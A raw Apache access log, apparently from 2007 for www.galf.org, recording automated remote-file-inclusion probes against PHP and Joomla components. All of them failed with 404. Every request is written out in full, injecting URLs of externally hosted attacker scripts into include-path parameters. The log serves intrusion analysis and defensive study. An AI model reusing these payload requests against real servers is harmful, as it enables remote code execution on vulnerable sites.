70.84.103.42 - - [07/Oct/2007:21:28:08 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.911auction.info/logs/ajeXpl/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.171.31.19 - - [07/Oct/2007:21:29:03 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.171.31.19 - - [07/Oct/2007:21:29:03 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.108.60.242 - - [07/Oct/2007:21:29:53 -0700] "GET /logs/access_070806.log/index2.php?to=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [07/Oct/2007:21:29:54 -0700] "GET /index2.php?to=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [07/Oct/2007:21:29:54 -0700] "GET /logs/index2.php?to=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:21:33:52 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:21:33:53 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.16.254.36 - - [07/Oct/2007:21:35:48 -0700] "GET /logs/access_070917.log/mvcw_conver.php?step=1&vwar_root=http://seti.com.ua/img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:21:40:56 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:21:41:03 -0700] "GET /logs/access_070618.log//components/com_simpleboard/image_upload.php?sbp=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
206.221.179.200 - - [07/Oct/2007:21:46:03 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://mastergold.sitesled.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.221.179.200 - - [07/Oct/2007:21:55:12 -0700] "GET /logs/access_070910.log//modules/agendax/addevent.inc.php?agendax_path=http://mastergold.sitesled.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.221.179.200 - - [07/Oct/2007:21:55:13 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://mastergold.sitesled.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.221.179.200 - - [07/Oct/2007:21:55:15 -0700] "GET /logs/access.log//modules/agendax/addevent.inc.php?agendax_path=http://mastergold.sitesled.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.25.135.213 - - [07/Oct/2007:22:04:03 -0700] "GET /logs/access_070702.log/index.php?page=http://www.electropol.com.co/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.135.213 - - [07/Oct/2007:22:04:03 -0700] "GET /index.php?page=http://www.electropol.com.co/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.135.213 - - [07/Oct/2007:22:04:03 -0700] "GET /logs/index.php?page=http://www.electropol.com.co/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.135.213 - - [07/Oct/2007:22:05:17 -0700] "GET /logs/access_070625.log/index.php?page=http://www.electropol.com.co/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.160.72.189 - - [07/Oct/2007:22:08:54 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.160.72.189 - - [07/Oct/2007:22:08:54 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.160.72.189 - - [07/Oct/2007:22:08:55 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.246.228.114 - - [07/Oct/2007:22:10:47 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.246.228.114 - - [07/Oct/2007:22:10:47 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.or